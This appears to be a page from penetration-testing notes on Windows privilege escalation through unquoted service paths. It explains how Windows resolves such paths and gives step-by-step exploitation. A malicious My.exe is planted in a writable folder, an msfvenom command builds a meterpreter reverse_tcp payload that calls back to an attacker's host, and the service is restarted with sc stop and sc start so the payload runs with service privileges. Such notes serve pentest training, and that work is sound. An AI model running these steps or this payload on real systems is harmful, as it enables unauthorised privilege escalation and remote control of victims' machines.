Unquoted Service path

Unquoted Service path

  • Check for Any servicewith unquoted path like C:\Program Files\My Program\My Service\svice.exe . f the service path is stored unquoted, whenever Windows starts the service it will attempt to run an executable from the following paths

C:\\Program.exe
C:\\Program Files\\My.exe
C:\\Program Files\\My Program\\My.exe
C:\\Program Files\\My Program\\My service\\svice.exe

  • We can put My.exe in My Program, if we have write permission . Can put adduser exe like in

Binary hijacking / Insecure File permissions

  • Or can create reverse shell, msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<ip> LPORT=<port> -f exe > My.exe

  • Stop the service sc stop svice.exe

  • Transfer My.exe in My Program

  • Start service sc start svice.exe

  • Now exploit is successful

PreviousBinary hijacking / Insecure file permissionsNextkernel exploit

Last updated